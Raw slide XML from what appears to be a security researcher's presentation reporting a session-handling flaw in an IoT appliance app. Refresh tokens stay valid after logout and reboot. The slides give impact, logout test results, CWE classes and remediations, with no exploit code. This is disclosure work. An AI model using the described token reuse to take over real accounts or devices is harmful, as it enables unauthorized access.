            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Master: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Cert.: *, *, *, *, * </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>other cyber security certifications and more etc.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Google Shape;99;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3703352" y="4524375"/>
            <a:ext cx="1034400" cy="284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alibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>/ferdigul</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="Google Shape;100;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3213371" y="4363620"/>
            <a:ext cx="584649" cy="584649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219928" y="4565800"/>
            <a:ext cx="1034400" cy="284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alibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>/gulferdi</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102" name="Google Shape;102;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="732362" y="4460522"/>
            <a:ext cx="487557" cy="487557"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Mail icon clipart" id="103" name="Google Shape;103;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6041773" y="4421814"/>
            <a:ext cx="487558" cy="487558"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6541050" y="4513600"/>
            <a:ext cx="2068500" cy="284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alibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>0xfrd1gul@gmail.com </a:t>
            </a:r>
            <a:endParaRPr sz="11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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="241" name="Google Shape;241;p34"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1128125" y="1542575"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{0C7ED1EB-2574-499A-8F1B-8AD002A6164D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1504950"/>
                <a:gridCol w="4705350"/>
              </a:tblGrid>
              <a:tr h="100000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Category</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200">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00">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impact Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200">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rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Account Takeover</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rPr>
                        <a:t>Full user access for any attacker capturing a valid refresh token</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rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Persistence</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rPr>
                        <a:t>Tokens valid across app logouts and device reboots</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rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Scope</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rPr>
                        <a:t>All users of the app may be impacted</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rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attack Feasibility</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rPr>
                        <a:t>Easy in a shared Wi-Fi or proxy-enabled environment (MITM)</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242" name="Google Shape;242;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="461850" y="450250"/>
            <a:ext cx="3000000" cy="1150200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🎯 Impact Analysis</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Google Shape;243;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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="248" name="Google Shape;248;p35"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1639500" y="1306200"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{0C7ED1EB-2574-499A-8F1B-8AD002A6164D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2200275"/>
                <a:gridCol w="2533650"/>
              </a:tblGrid>
              <a:tr h="292750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Action</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200">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00">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Result</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200">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2750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>User logs out</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oboto Mono"/>
                          <a:ea typeface="Roboto Mono"/>
                          <a:cs typeface="Roboto Mono"/>
                          <a:sym typeface="Roboto Mono"/>
                        </a:rPr>
                        <a:t>refreshToken</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> remains valid ❌</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2750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Device reboot</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rPr>
                        <a:t>Token validity persists ❌</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2750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Generate new access token</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rPr>
                        <a:t>Success ✅</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2750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>API access with new token</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rPr>
                        <a:t>Authorized ✅</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249" name="Google Shape;249;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314525" y="205325"/>
            <a:ext cx="3000000" cy="1148700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🔁 Logout Test Results</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Google Shape;250;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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="255" name="Google Shape;255;p36"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1231250" y="1503375"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{0C7ED1EB-2574-499A-8F1B-8AD002A6164D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="942975"/>
                <a:gridCol w="5334000"/>
              </a:tblGrid>
              <a:tr h="295275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CWE ID</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200">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solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="00FF00"/>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rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CWE-287</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rPr>
                        <a:t>Improper Authentication</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rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CWE-284</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rPr>
                        <a:t>Improper Access Control</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rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CWE-200</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rPr>
                        <a:t>Exposure of Sensitive Information to an Unauthorized Actor</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275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CWE-613</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rPr>
                        <a:t>Insufficient Session Expiration (Refresh tokens remain valid post-logout)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="57150" marB="57150" marR="123825" marL="1238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256" name="Google Shape;256;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314525" y="255825"/>
            <a:ext cx="3000000" cy="774600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🛡️ Security Classification</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398500" y="918150"/>
            <a:ext cx="8794500" cy="3519600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🧩 Recommended Remediations</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invalidate refresh tokens after logout</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Enforce device-based token binding (DeviceID, IP, etc.)</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Implement single-use refresh tokens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Apply strict token expiration and rate limiting</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Use secure token revocation mechanisms</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>📍 Conclusion</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This vulnerability enables persistent unauthorized access to smart appliances via insecure session handling. Even a low-privileged internal attacker (e.g., someone on the same Wi-Fi) can exploit this flaw to take over accounts and control IoT devices.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="152400" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🛑 Severity: Critical – Immediate remediation is strongly recommended.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Google Shape;263;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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
